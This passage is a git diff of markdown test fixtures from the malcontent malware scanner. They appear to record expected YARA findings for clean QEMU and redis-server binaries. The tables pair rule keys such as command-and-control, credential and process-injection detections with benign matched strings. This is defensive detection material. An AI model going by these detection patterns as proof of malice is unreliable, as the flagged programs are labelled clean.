[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | +| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | +| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | +| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | +| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | +| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | +| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current 
process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index c5917e34a..300e3d50b 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,52 +1,51 @@ ## linux/clean/redis-server.aarch64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
[echo madvise > /sys/kernel/mm/transparent_hugepage/enabled' as root](https://github.com/search?q=echo+madvise+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27+as+root&type=code)
[echo never > /sys/kernel/mm/transparent_hugepage/enabled'](https://github.com/search?q=echo+never+%3E+%2Fsys%2Fkernel%2Fmm%2Ftransparent_hugepage%2Fenabled%27&type=code)
[echo tsc > /sys/devices/system/clocksource/clocksource0/current_clock](https://github.com/search?q=echo+tsc+%3E+%2Fsys%2Fdevices%2Fsystem%2Fclocksource%2Fclocksource0%2Fcurrent_clock&type=code) | -| MEDIUM | [fs/file/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-create.yara#CreateFile) | create a new file | [CreateFileEvent](https://github.com/search?q=CreateFileEvent&type=code) | -| MEDIUM | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#DeleteFile) | delete a file | [DeleteFileEvent](https://github.com/search?q=DeleteFileEvent&type=code) | -| MEDIUM | [fs/file/times_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-times-set.yara#shell_toucher) | change file timestamps | [touch the specified keys](https://github.com/search?q=touch+the+specified+keys&type=code) | -| MEDIUM | [fs/path/relative](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/relative.yara#relative_path_val) | references and possibly executes relative path | [./redis-check-aof](https://github.com/search?q=.%2Fredis-check-aof&type=code)
[./redis-server](https://github.com/search?q=.%2Fredis-server&type=code) | -| MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/dump.bin](https://github.com/search?q=%2Ftmp%2Fdump.bin&type=code)
[/tmp/dump.hex](https://github.com/search?q=%2Ftmp%2Fdump.hex&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%ld/smaps](https://github.com/search?q=%2Fproc%2F%25ld%2Fsmaps&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [RM_SendChildHeartbeat](https://github.com/search?q=RM_SendChildHeartbeat&type=code)
[RedisModule_SendChildHeartbeat](https://github.com/search?q=RedisModule_SendChildHeartbeat&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/ip/addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/addr.yara#ip_addr) | mentions an 'IP address' | [IP address](https://github.com/search?q=IP+address&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntop](https://github.com/search?q=inet_ntop&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | generic listen string | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [daemonize](https://github.com/search?q=daemonize&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code)
[createPidFile](https://github.com/search?q=createPidFile&type=code) | -| MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [Check your memory ASAP !!!](https://github.com/search?q=Check+your+memory+ASAP+%21%21%21&type=code)
[Sentinel was not able to save the new configuration on disk!!!](https://github.com/search?q=Sentinel+was+not+able+to+save+the+new+configuration+on+disk%21%21%21&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [ACLCheckPasswordHash](https://github.com/search?q=ACLCheckPasswordHash&type=code)
[ACLHashPassword](https://github.com/search?q=ACLHashPassword&type=code)
[authentication password for the default](https://github.com/search?q=authentication+password+for+the+default&type=code)
[bit user password](https://github.com/search?q=bit+user+password&type=code)
[checkPasswordBasedAuth](https://github.com/search?q=checkPasswordBasedAuth&type=code)
[for the output password](https://github.com/search?q=for+the+output+password&type=code)
[passwords](https://github.com/search?q=passwords&type=code)
[the number of password](https://github.com/search?q=the+number+of+password&type=code)
[tlsPasswordCallback](https://github.com/search?q=tlsPasswordCallback&type=code)
[username and password](https://github.com/search?q=username+and+password&type=code)
[username-password pair or user is](https://github.com/search?q=username-password+pair+or+user+is&type=code) | -| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) | -| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) | -| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) | -| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | -| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | -| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-write.yara#file_write) | writes to file | [ewriteConfigOverwriteFile](https://github.com/search?q=ewriteConfigOverwriteFile&type=code) | -| LOW | [fs/lock_update](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/lock-update.yara#flock) | apply or remove an advisory lock on a 
file | [flock](https://github.com/search?q=flock&type=code) | -| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/myredis.conf](https://github.com/search?q=%2Fetc%2Fmyredis.conf&type=code)
[/etc/rc.local](https://github.com/search?q=%2Fetc%2Frc.local&type=code)
[/etc/redis/](https://github.com/search?q=%2Fetc%2Fredis%2F&type=code)
[/etc/sentinel.conf](https://github.com/search?q=%2Fetc%2Fsentinel.conf&type=code)
[/etc/sysctl.conf](https://github.com/search?q=%2Fetc%2Fsysctl.conf&type=code) | -| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/run/redis.pid](https://github.com/search?q=%2Fvar%2Frun%2Fredis.pid&type=code) | -| LOW | [fs/tempdir/tempfile_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [temp file](https://github.com/search?q=temp+file&type=code) | -| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | -| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recv) | [receive a message to a socket](https://linux.die.net/man/2/recv) | [recv](https://github.com/search?q=recv&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#send) | [send a message to a socket](https://linux.die.net/man/2/send) | [send](https://github.com/search?q=send&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://redis.io/commands/slowlog](https://redis.io/commands/slowlog)
[https://redis.io/topics/latency-monitor.](https://redis.io/topics/latency-monitor.) | -| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_create](https://github.com/search?q=epoll_create&type=code)
[epoll_wait](https://github.com/search?q=epoll_wait&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | +| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | +| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
